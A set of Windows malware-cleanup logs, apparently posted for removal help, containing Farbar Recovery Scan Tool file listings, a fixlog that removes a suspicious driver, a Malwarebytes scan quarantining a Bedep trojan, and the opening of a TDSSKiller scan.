2015-07-16 08:41 - 2014-12-08 15:42 - 00038264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2015-07-16 08:41 - 2014-12-08 15:42 - 00033584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2015-07-16 08:41 - 2014-10-30 18:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2015-07-16 08:41 - 2014-10-30 18:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2015-07-16 08:40 - 2015-05-02 20:39 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-07-16 08:38 - 2015-05-07 11:21 - 00522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-05-07 11:05 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-04-09 20:34 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-07-16 08:38 - 2015-04-09 20:11 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-07-15 16:18 - 2015-02-20 19:49 - 00780800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2015-07-15 16:16 - 2015-04-24 22:25 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00239424 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00154432 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2015-07-15 11:02 - 2015-04-30 16:35 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-07-15 11:02 - 2015-04-30 16:35 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-07-13 15:36 - 2015-07-13 15:36 - 00002233 _____ C:\Users\Richie\Desktop\HP Support Assistant.lnk
2015-07-10 18:12 - 2015-07-12 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2015-07-10 18:12 - 2015-07-10 18:12 - 00000000 __SHD C:\Recovery
2015-07-10 18:08 - 2015-07-10 18:08 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\inetpub
2015-07-10 18:03 - 2013-08-03 00:48 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-07-10 18:03 - 2013-08-03 00:41 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-07-10 15:59 - 2015-07-20 08:44 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieBrowserModeList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieUserList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieSiteList
2015-07-10 15:39 - 2015-07-30 19:52 - 00000000 ___RD C:\Users\Richie\OneDrive
2015-07-10 15:30 - 2015-07-10 15:30 - 00001442 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-10 15:28 - 2015-07-10 15:28 - 00000020 ___SH C:\Users\Richie\ntuser.ini
2015-07-10 15:20 - 2015-07-30 20:12 - 01188204 _____ C:\WINDOWS\WindowsUpdate.log
2015-07-10 15:19 - 2015-07-10 15:19 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-07-10 14:53 - 2015-07-10 14:53 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default\Documents\hp.system.package.metadata
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default User\Documents\hp.system.package.metadata
2015-07-10 14:46 - 2015-07-10 14:46 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2015-07-10 14:35 - 2015-07-27 20:13 - 00000000 ____D C:\Users\Richie
2015-07-10 14:35 - 2015-07-10 14:45 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-07-10 14:35 - 2013-08-22 11:36 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagwrn.xml
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagerr.xml
2015-07-10 14:21 - 2015-07-10 14:45 - 00012096 _____ C:\WINDOWS\iis.log
2015-07-10 14:21 - 2015-07-10 14:21 - 00930400 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-07-10 14:16 - 2015-07-10 14:16 - 00000264 _____ C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Realtek
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____D C:\Program Files\Synaptics
2015-07-10 12:07 - 2015-07-10 15:20 - 00006605 _____ C:\WINDOWS\comsetup.log
2015-07-08 08:00 - 2015-07-12 01:09 - 00000000 ____D C:\WINDOWS\system32\AutoUpdateLicense
2015-07-06 09:21 - 2015-03-04 03:26 - 00011105 ____N C:\WINDOWS\system32\AutoconfigV2.cab
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-30 20:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-07-30 19:56 - 2013-06-06 20:08 - 00003922 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3DBD3851-149E-4BFD-A49D-F9E67AA1E10F}
2015-07-30 19:02 - 2014-11-21 04:34 - 00871062 _____ C:\WINDOWS\PFRO.log
2015-07-30 19:02 - 2013-08-22 10:46 - 00298565 _____ C:\WINDOWS\setupact.log
2015-07-30 19:02 - 2013-08-22 10:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-07-30 19:02 - 2013-08-22 09:25 - 01048576 ___SH C:\WINDOWS\system32\config\BBI
2015-07-30 19:01 - 2014-12-13 13:42 - 00000000 ___HD C:\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}
2015-07-30 18:25 - 2013-06-06 22:42 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2321640021-2341620851-140482586-1002
2015-07-30 17:48 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-07-29 20:44 - 2014-11-21 04:44 - 00956476 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-07-29 20:40 - 2013-08-22 09:25 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2015-07-28 17:09 - 2012-07-26 03:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-07-28 13:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\vpnplugins
2015-07-28 13:17 - 2013-06-06 20:08 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Adobe
2015-07-28 12:02 - 2013-09-27 22:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-07-27 20:17 - 2013-08-22 10:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-07-27 19:02 - 2013-04-23 03:51 - 00000000 ____D C:\ProgramData\Norton
2015-07-27 18:55 - 2012-07-26 04:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2015-07-25 09:18 - 2013-06-06 20:03 - 00000000 ____D C:\Users\Richie\AppData\Local\Packages
2015-07-21 16:58 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\rescache
2015-07-20 08:44 - 2015-01-29 00:30 - 00020480 ___SH C:\Users\Richie\Desktop\Thumbs.db
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ToastData
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\WinStore
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-07-20 08:00 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2015-07-18 11:03 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-07-18 08:25 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppCompat
2015-07-17 10:52 - 2014-11-21 04:25 - 00000000 ____D C:\Program Files\Windows Journal
2015-07-17 09:50 - 2013-04-23 02:57 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-07-17 08:53 - 2014-11-21 11:56 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-07-13 17:10 - 2014-11-21 12:03 - 00792568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-07-13 17:10 - 2014-11-21 12:03 - 00178168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-13 15:37 - 2014-07-06 22:58 - 00000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-07-13 15:34 - 2012-08-17 14:00 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-07-13 15:30 - 2012-08-17 14:26 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-07-13 15:29 - 2012-08-17 14:28 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-07-13 15:25 - 2012-08-03 20:02 - 00000000 ____D C:\SWSetup
2015-07-10 18:09 - 2013-08-22 11:36 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-07-10 18:04 - 2014-11-21 05:16 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-07-10 15:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Registration
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RSD C:\WINDOWS\Media
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RHD C:\Users\Public\Libraries
2015-07-10 14:54 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-07-10 14:54 - 2013-04-23 03:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2015-07-10 14:54 - 2013-04-23 03:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink LabelPrint
2015-07-10 14:54 - 2013-04-23 03:23 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2015-07-10 14:54 - 2012-08-17 14:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-10 14:54 - 2012-08-17 14:13 - 00000000 ____D C:\WINDOWS\en
2015-07-10 14:54 - 2012-08-17 14:12 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-07-10 14:53 - 2013-08-22 11:37 - 00005217 _____ C:\WINDOWS\DtcInstall.log
2015-07-10 14:53 - 2012-07-26 01:37 - 00000000 ____D C:\Users\Default.migrated
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\WCN
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\system32\WCN
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\spool
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\IME
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\SMI
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-07-10 14:52 - 2013-04-23 03:06 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-07-10 14:52 - 2012-08-17 14:07 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-07-10 14:50 - 2013-08-22 11:43 - 00000000 ____D C:\WINDOWS\DigitalLocker
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Help
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-10 14:50 - 2012-08-03 18:29 - 00000000 ____D C:\ProgramData\PRICache
2015-07-10 14:46 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-07-10 14:14 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Default
2015-07-10 13:48 - 2013-06-06 20:03 - 02013866 _____ C:\WINDOWS\WindowsUpdate (1).log
2015-07-10 10:22 - 2012-07-26 04:12 - 00000000 ____D C:\WINDOWS\AUInstallAgent
2015-07-06 16:41 - 2015-06-21 01:14 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-07-03 08:43 - 2013-07-17 21:58 - 130333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
Some files in TEMP:
====================
C:\Users\Richie\AppData\Local\Temp\avgnt.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-07-30 19:13
 
==================== End of log ============================
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:30-07-2015
Ran by Richie (2015-07-30 17:45:56) Run:2
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
2015-07-29 20:41 - 2015-07-29 20:41 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfrrubmu.sys
S1 vfrrubmu; C:\WINDOWS\system32\drivers\vfrrubmu.sys [55168 2015-07-29] (Microsoft Corporation)
AlternateDataStreams: C:\WINDOWS\system32\Drivers\vfrrubmu.sys:changelist
C:\WINDOWS\system32\Drivers\vfrrubmu.sys
*****************
 
C:\WINDOWS\system32\Drivers\vfrrubmu.sys => moved successfully.
vfrrubmu => service removed successfully
"C:\WINDOWS\system32\Drivers\vfrrubmu.sys" => ":changelist" ADS not found.
"C:\WINDOWS\system32\Drivers\vfrrubmu.sys" => File/Folder not found.
 
==== End of Fixlog 17:45:56 ====
 
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 7/30/2015
Scan Time: 5:49 PM
Logfile: MBAM73015.txt
Administrator: Yes
 
Version: 2.1.8.1057
Malware Database: v2015.07.30.05
Rootkit Database: v2015.07.29.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: Richie
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 342067
Time Elapsed: 53 min, 42 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 1
Trojan.Bedep.64, C:\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll, Quarantined, [826bcd1aa9e187af6ab73e7aa55ca25e], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
20:01:50.0324 0x07fc  TDSS rootkit removing tool 3.1.0.5 Jul 24 2015 12:29:57
20:01:50.0324 0x07fc  UEFI system
20:02:05.0137 0x07fc  ============================================================
20:02:05.0137 0x07fc  Current date / time: 2015/07/30 20:02:05.0137
20:02:05.0137 0x07fc  SystemInfo:
20:02:05.0137 0x07fc  
20:02:05.0137 0x07fc  OS Version: 6.3.9600 ServicePack: 0.0
20:02:05.0137 0x07fc  Product type: Workstation
20:02:05.0137 0x07fc  ComputerName: RICHIE
20:02:05.0137 0x07fc  UserName: Richie
20:02:05.0137 0x07fc  Windows directory: C:\WINDOWS
20:02:05.0137 0x07fc  System windows directory: C:\WINDOWS
20:02:05.0137 0x07fc  Running under WOW64
20:02:05.0137 0x07fc  Processor architecture: Intel x64
20:02:05.0137 0x07fc  Number of processors: 2
20:02:05.0137 0x07fc  Page size: 0x1000
20:02:05.0137 0x07fc  Boot type: Normal boot
20:02:05.0137 0x07fc  ============================================================
20:02:15.0137 0x07fc  KLMD registered as C:\WINDOWS\system32\drivers\00497482.sys
20:02:15.0574 0x07fc  System UUID: {6E1B4100-1740-6274-E519-749EB32D096C}
20:02:16.0699 0x07fc  Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
20:02:16.0715 0x07fc  ============================================================
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0:
20:02:16.0715 0x07fc  GPT partitions:
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition1: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {527654E6-355D-4D23-B23C-07A508122EDD}, Name: Basic data partition, StartLBA 0x800, BlocksNum 0xC8000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition2: GPT, TypeGUID: {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}, UniqueGUID: {5905A1D1-2B57-4313-97E1-C6245BB70652}, Name: EFI system partition, StartLBA 0xC8800, BlocksNum 0x82000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition3: GPT, TypeGUID: {E3C9E316-0B5C-4DB8-817D-F92DF00215AE}, UniqueGUID: {A43CD64E-5D8A-4DF8-9926-EB2BA0CB4C71}, Name: Microsoft reserved partition, StartLBA 0x14A800, BlocksNum 0x40000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition4: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {60C8978A-209E-44C8-BE7D-80D75D1DABD0}, Name: Basic data partition, StartLBA 0x18A800, BlocksNum 0x222FA000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition5: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {52418E1D-4081-4874-B79A-83D3C7FA2A01}, Name: , StartLBA 0x22484800, BlocksNum 0xE1800
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition6: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {3188E610-2894-4741-AF27-EE86920D51F5}, Name: Basic data partition, StartLBA 0x22566000, BlocksNum 0x2EC8800
20:02:16.0715 0x07fc  MBR partitions:
20:02:16.0715 0x07fc  ============================================================
20:02:16.0746 0x07fc  C: <-> \Device\Harddisk0\DR0\Partition4
20:02:16.0793 0x07fc  D: <-> \Device\Harddisk0\DR0\Partition6
20:02:16.0793 0x07fc  ============================================================
20:02:16.0793 0x07fc  Initialize success
20:02:16.0793 0x07fc  ============================================================
20:02:33.0502 0x0b14  ============================================================
20:02:33.0502 0x0b14  Scan started
20:02:33.0502 0x0b14  Mode: Manual; 
20:02:33.0502 0x0b14  ============================================================
20:02:33.0502 0x0b14  KSN ping started
20:02:33.0549 0x0b14  KSN ping finished: false
20:02:36.0588 0x0b14  ================ Scan system memory ========================
20:02:36.0588 0x0b14  System memory - ok
20:02:36.0588 0x0b14  ================ Scan services =============================
20:02:36.0885 0x0b14  [ E1832BD9FD7E0FC2DC9FA5935DE3E8C1, 41FF7418887AFC8B9C96EF21C5950DD342CC9E3C0D87AFD60A05B988C1D6CC23 ] 1394ohci        C:\WINDOWS\System32\drivers\1394ohci.sys
20:02:36.0916 0x0b14  1394ohci - ok
20:02:36.0963 0x0b14  [ AD508A1A46EC21B740AB31C28EFDFDB1, 9B1046CF0B80723149BD359B55CC0B8B3ABBEAA9038469F542A4C345C503FB02 ] 3ware           C:\WINDOWS\system32\drivers\3ware.sys
20:02:36.0994 0x0b14  3ware - ok
20:02:37.0229 0x0b14  [ E796AE43DDD1844281DB4D57294D17C0, 21AE69615044A96041E46476BE814B52C22624B6C7EA6BFC77BB64F69C3C21F5 ] ACPI            C:\WINDOWS\system32\drivers\ACPI.sys
20:02:37.0369 0x0b14  ACPI - ok
20:02:37.0385 0x0b14  [ AC8279D229398BCF05C3154ADCA86813, 083E86CBE53244D24C334DB1511C77025133AE7875191845764B890A8CA5AFA9 ] acpiex          C:\WINDOWS\system32\Drivers\acpiex.sys
20:02:37.0401 0x0b14  acpiex - ok
20:02:37.0448 0x0b14  [ A8970D9BF23CD309E0403978A1B58F3F, 9946C8477104EEC7DB197E2222F9905307F101C398CCED4B5FD0F86A5622C791 ] acpipagr        C:\WINDOWS\System32\drivers\acpipagr.sys
20:02:37.0463 0x0b14  acpipagr - ok
20:02:37.0508 0x0b14  [ 111A89C99C5B4F1A7BCE5F643DD86F65, 41A2E49FF443927D05F7EF638518108227852984E68D4663C8761178C0B84A45 ] AcpiPmi         C:\WINDOWS\System32\drivers\acpipmi.sys
20:02:37.0516 0x0b14  AcpiPmi - ok
20:02:37.0532 0x0b14  [ 5758387D68A20AE7D3245011B07E36E7, 77832E200E8B0D259552F6F60FE454A887E3EBBB9EA2F3590E6645289A04E293 ] acpitime        C:\WINDOWS\System32\drivers\acpitime.sys
20:02:37.0547 0x0b14  acpitime - ok
20:02:37.0625 0x0b14  [ 7C1FDF1B48298CBA7CE4BDD4978951AD, 80F4D536E1231B30E836F72ADC8814AE6AA9FEC573FB5F3F965FAC8ABCCAF0F8 ] ADP80XX         C:\WINDOWS\system32\drivers\ADP80XX.SYS
20:02:37.0672 0x0b14  ADP80XX - ok
20:02:37.0750 0x0b14  [ BCD58DACAA1EAAADC115EDD940478F6D, F31613F583C302F62A00E6766B031531C9E193CAED563689B178BA257715B992 ] AeLookupSvc     C:\WINDOWS\System32\aelupsvc.dll
20:02:37.0766 0x0b14  AeLookupSvc - ok
20:02:37.0860 0x0b14  [ D1E343BC00136CE03C4D403194D06A80, 94F2543164A2CEA179EDE53E1294EE24391A59CAEFF83BA5CE9385E8E686E89C ] AERTFilters     C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
20:02:37.0891 0x0b14  AERTFilters - ok
20:02:37.0953 0x0b14  [ 374E27295F0A9DCAA8FC96370F9BEEA5, 51C394E0C2322D7D093941A1B8766171B5D1F47DF2FE0834209492891EA7D999 ] AFD             C:\WINDOWS\system32\drivers\afd.sys
20:02:37.0985 0x0b14  AFD - ok
20:02:38.0032 0x0b14  [ 7DFAEBA9AD62D20102B576D5CAC45EC8, 9FA5207335303D1E8E9A3C9E1FB82C09AD21B04382F69D777A67E48EE91D2093 ] agp440          C:\WINDOWS\system32\drivers\agp440.sys
20:02:38.0047 0x0b14  agp440 - ok
20:02:38.0094 0x0b14  [ FE14D249D39368CA62D8DA6BC94AC694, E1036E22BFBD3750FD2D3DA6AB939B2DD54E824F4BD3E6539EF0E45AB5453DD1 ] ahcache         C:\WINDOWS\system32\DRIVERS\ahcache.sys
20:02:38.0094 0x0b14  ahcache - ok
